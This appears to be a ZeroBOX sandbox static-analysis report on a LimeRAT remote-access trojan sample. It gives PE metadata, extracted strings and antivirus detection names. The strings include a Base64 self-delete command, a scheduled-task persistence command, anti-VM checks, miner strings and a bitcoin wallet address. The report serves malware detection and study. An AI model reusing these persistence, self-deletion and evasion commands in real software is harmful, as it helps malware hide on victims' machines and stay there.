Static | ZeroBOX

PE Compile Time

2023-09-21 09:29:15

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00006d54 0x00006e00 6.05515742005
.rsrc 0x0000a000 0x00069a8c 0x00069c00 5.26662502887
.reloc 0x00074000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x000735a0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00073a08 0x00000084 LANG_NEUTRAL SUBLANG_NEUTRAL data

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v2.0.50727
#Strings
_Closure$__R1-0
$IR12-1
_Lambda$__R12-1
ThreadSafeObjectProvider`1
List`1
$IR13-2
_Lambda$__R13-2
kernel32
Microsoft.Win32
ToInt32
_Lambda$__R2
$VB$NonLocal_2
get_UTF8
<Module>
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
EXECUTION_STATE
System.IO
ES_CONTINUOUS
_Closure$__
Dispose__Instance__
Create__Instance__
value__
ProjectData
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
Thread
RijndaelManaged
get_IsAttached
get_Connected
Append
CompareMethod
get_Clipboard
Replace
CreateInstance
get_GetInstance
instance
GetHashCode
set_Mode
FileMode
EnterDebugMode
CompressionMode
CipherMode
SelectMode
FromImage
DrawImage
get_Message
Invoke
GetEnvironmentVariable
get_Available
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
Rectangle
DownloadFile
DeleteFile
IsInRole
WindowsBuiltInRole
AppWinStyle
get_Name
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_UserName
GetProcessesByName
DateTime
get_LastWriteTime
GetType
MethodBase
ConsoleApplicationBase
Dispose
EditorBrowsableState
SetThreadExecutionState
SetApartmentState
Delete
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
EditorBrowsableAttribute
ComVisibleAttribute
StandardModuleAttribute
HideModuleNameAttribute
DebuggerHiddenAttribute
MyGroupCollectionAttribute
m_ThreadStaticValue
DeleteValue
GetObjectValue
GetValue
SetValue
Receive
set_SendBufferSize
set_ReceiveBufferSize
get_Jpeg
System.Threading
add_SessionEnding
NewLateBinding
Encoding
System.Drawing.Imaging
IsLogging
FromBase64String
ToBase64String
CompareString
ToString
GetString
Substring
System.Drawing
ComputeHash
get_ExecutablePath
get_Width
get_Length
StartsWith
TimerCallback
TransformFinalBlock
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
ConditionalCompareObjectNotEqual
System.ComponentModel
LateCall
kernel32.dll
NTdll.dll
coredll.dll
FileStream
GZipStream
MemoryStream
get_Item
System
SymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
ToBoolean
CopyFromScreen
get_PrimaryScreen
System.ComponentModel.Design
AppDomain
get_CurrentDomain
System.IO.Compression
MyApplication
CopyPixelOperation
Interaction
System.Reflection
ManagementObjectCollection
set_Position
Exception
Environ
get_Reason
get_Info
MethodInfo
FileInfo
FileSystemInfo
MemberInfo
ComputerInfo
DirectoryInfo
Bitmap
EndApp
MD5CryptoServiceProvider
StringBuilder
ToInteger
Debugger
ManagementObjectSearcher
SessionEndingEventHandler
System.CodeDom.Compiler
ToUpper
CurrentUser
BitConverter
ServerComputer
MyComputer
ToLower
ClearProjectError
SetProjectError
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
Graphics
System.Diagnostics
get_Bounds
GetMethods
Microsoft.VisualBasic.Devices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
Microsoft.VisualBasic.MyServices
GetInstances
GetDirectories
GetTypes
GetBytes
SocketFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
System.Windows.Forms
Contains
Conversions
SessionEndReasons
RuntimeHelpers
Operators
ManagementClass
FileAccess
Process
System.Net.Sockets
SystemEvents
Exists
Concat
ImageFormat
PixelFormat
AddObject
ManagementBaseObject
ConcatenateObject
ManagementObject
MyProject
Connect
LateGet
LateIndexGet
System.Net
Socket
SystemIdleTimerReset
get_Height
GraphicsUnit
get_Default
ToUpperInvariant
get_Client
WebClient
TcpClient
System.Management
RuntimeEnvironment
Component
get_Current
GetCurrent
ParameterizedThreadStart
Convert
set_SendTimeout
set_ReceiveTimeout
MoveNext
System.Text
GetText
SetText
Client.My
ToArray
set_Key
CreateSubKey
RegistryKey
System.Security.Cryptography
Assembly
LoadLibrary
GetRuntimeDirectory
CreateDirectory
Registry
WindowsIdentity
ClipboardProxy
MyTemplate
11.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
_CorExeMain
mscoree.dll
<'J_]Ds
9(CUc4Oa
S'6zcC
Wb[?Q`_
_VC3u9
cP8dt8
G`ecFai
OUPcNVS$
aL8j_M:B]M;
'7E3WpzNm
R"M^C$
aS=ZjM0
eO9 s8
I]bB<n
Yl?XkB#JjE'6eQ?!^\X
'(">PY>Uc
b,*u1
I[]Z4w
keK4Q_RC*Pck
T'i}Y3=zX5"xW4
|Y55~Q%^
V!adB
VOC\Dcp"
#8E4.;CbB*
eN5_It
[O?^M[\08p
$XwDGTY
mD"1S`n
qnE#]_M88I\a
,("<S0
vL(B~T/J
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
SbieDll.dll
windir
\vboxhook.dll
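Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=
[note: the string above is Base64 for "cmd.exe /c ping 0 -n 2 & del " (trailing space). It appears to be the prefix of a delayed self-delete command, with the file path appended at run time; the decoded form is the more useful pattern for process command-line detection.]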
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
Microsoft
Windows
Unkown
PROCESSOR_ARCHITECTURE
dd/MM/yyy
Win32_Processor
ProcessorId
Win32_BIOS
SerialNumber
Win32_BaseBoard
Win32_VideoController
Rans-Status
Not encrypted
Not ready
Disabled
\root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
Regasm
select CommandLine from Win32_Process where Name='{0}'
Regasm.exe
CommandLine
--donate-level=
Minning...
Win32_Processor.deviceid="CPU0"
Core(TM)
Unknow
Software\
:Zone.Identifier
uvT++8AamBJZhc3I5w897JOAd95xsoYzsmpa5Sck+OeJHB2YInf3TEg05tZPOfhS
explorer.exe
AppData
\WinExplorer\
bc1qkrux9qr0mu3ffgysy47lh3mh2638vxeu6vpufu
!PSend
!PStart
Error!
Plugin Error!
length
DownloadString
v0.1.9.2
schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'
Software\Microsoft\Windows\CurrentVersion\Run\
Flood!
_USB Error!
_PIN Error!
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Generic.mein
tehtris Clean
DrWeb Trojan.DownLoader29.2373
MicroWorld-eScan Generic.MSIL.LimeRAT.433BCB8A
FireEye Generic.mg.76599bf790a73e2b
CAT-QuickHeal Clean
ALYac Generic.MSIL.LimeRAT.433BCB8A
Malwarebytes Generic.Malware.AI.DDS
Zillya Trojan.Agent.Win32.3713389
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005684c61 )
BitDefender Generic.MSIL.LimeRAT.433BCB8A
K7GW Trojan ( 005684c61 )
Cybereason malicious.33d311
BitDefenderTheta Gen:NN.ZemsilF.36738.CmW@aOM2CPe
VirIT Trojan.Win32.MSIL_Heur.A
Cyren W32/LimeRAT.C.gen!Eldorado
Symantec Trojan.LimeRat
Elastic Windows.Trojan.Limerat
ESET-NOD32 a variant of MSIL/Agent.BPK
APEX Malicious
Paloalto Clean
ClamAV Win.Malware.Barys-6836745-0
Kaspersky HEUR:Trojan.MSIL.Tasker.gen
Alibaba Backdoor:MSIL/LimeRAT.5118b87b
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Limerat.462336
Tencent Trojan.Msil.Tasker.za
TACHYON Clean
Sophos Mal/LimeRAT-A
F-Secure Trojan.TR/Dropper.Gen7
Baidu Clean
VIPRE Generic.MSIL.LimeRAT.433BCB8A
TrendMicro Coinminer.MSIL.LIMERAT.SMA
McAfee-GW-Edition BehavesLike.Win32.Generic.gm
Trapmine malicious.high.ml.score
CMC Clean
Emsisoft Generic.MSIL.LimeRAT.433BCB8A (B)
SentinelOne Static AI - Malicious PE
GData MSIL.Backdoor.LimeRat.B
Jiangmin Clean
Webroot Clean
Google Detected
Avira TR/Dropper.Gen7
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Trojan.Win32.Agent.sa
Xcitium Clean
Arcabit Generic.MSIL.LimeRAT.433BCB8A
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Tasker.gen
Microsoft Backdoor:MSIL/LimeRAT.A!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Win-Trojan/LimeRAT.Exp
Acronis Clean
McAfee GenericRXIW-YI!76599BF790A7
MAX malware (ai score=80)
DeepInstinct MALICIOUS
VBA32 Backdoor.MSIL.Lime.Heur
Cylance unsafe
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Coinminer.MSIL.LIMERAT.SMA
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
Ikarus Trojan.MSIL.Agent
MaxSecure Clean
Fortinet MSIL/Agent.SWO!tr
AVG Win32:CrypterX-gen [Trj]
Avast Win32:CrypterX-gen [Trj]
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.